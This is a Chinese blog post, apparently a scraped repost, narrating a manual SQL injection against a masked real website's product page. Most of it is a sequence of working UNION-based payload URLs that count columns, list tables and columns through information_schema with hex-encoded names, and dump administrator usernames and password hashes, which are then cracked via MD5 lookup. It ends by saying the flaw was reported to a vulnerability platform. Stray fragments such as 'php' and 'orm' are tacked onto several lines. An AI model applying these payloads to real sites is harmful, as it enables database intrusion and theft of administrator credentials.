純手工注入

時間 2020-02-06

標籤手工注入简体版

原文原文鏈接

開門見山

掃到一個站存在SQL注入，放到阿D、明小子上猜解失敗，欲放棄，忽然打算試一下手工注入。php

1. 驗證是否可注入編碼

http://www.xxx.com.cn/product-detail.php?pid=21’ spa

再用 and 1=1和 and 1=2驗證3d

肯定有注入orm

2. 猜字段blog

http://www.xxx.com.cn/product-detail.php?pid=21 order by 37 正常頁面ip

http://www.xxx.com.cn/product-detail.php?pid=21 order by 38 報錯頁面io

字段數爲37table

3. 暴出字段位置form

http://www.xxx.com.cn/product-detail.php?pid=21 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37

4. 暴庫和管理員信息

http://www.xxx.com.cn/product-detail.php?pid=21 UNION SELECT 1,2,3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37

獲得庫名和管理員信息

5. 列當前庫的表名

庫名的十六進制編碼 0x736565xxxxxx6E67

http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,group_concat(table_name),3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.tables where table_schema=0x736565xxxxxx6E67

表名太多用審覈元素列開查看

猜測 admin 或者 admin_login 多是存放管理員帳號與密碼的表

6. 在第17個字段暴出admin_login表的字段

admin_login 十六進制編碼 0x61646D696Exxxxxxxx696E

http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,group_concat(table_name),3,4,5,6,7,8,user(),10,11,database(),13,14,15,16,group_concat(column_name),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from information_schema.columns where table_name=0x61646D696Exxxxxxxx696E

字段 id,username,ip,ctime,id,ip,ctime,username

7. 再在第17個字段暴出admin表的字段

admin 十六進制編碼 0x61646xxx6E

審覈元素列開查看

admin表的字段：id,username,password,ctime,logintime,loginsum,id,username,password,permission,ctime,logintime,loginsum

8. 暴出字段內容

0x3a 的十六進制是：用來分隔字段內容

http://www.xxx.com.cn/product-detail.php?pid=21 union select 1,2,3,4,5,6,7,8,user(),10,11,database(),13,14,15,group_concat(username,0x3a,password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from admin

獲得字段內容，也就是管理員登陸帳號

使用MD5解密

9. 提交補天漏洞平臺

不到一週，獲得廠商回覆和確定。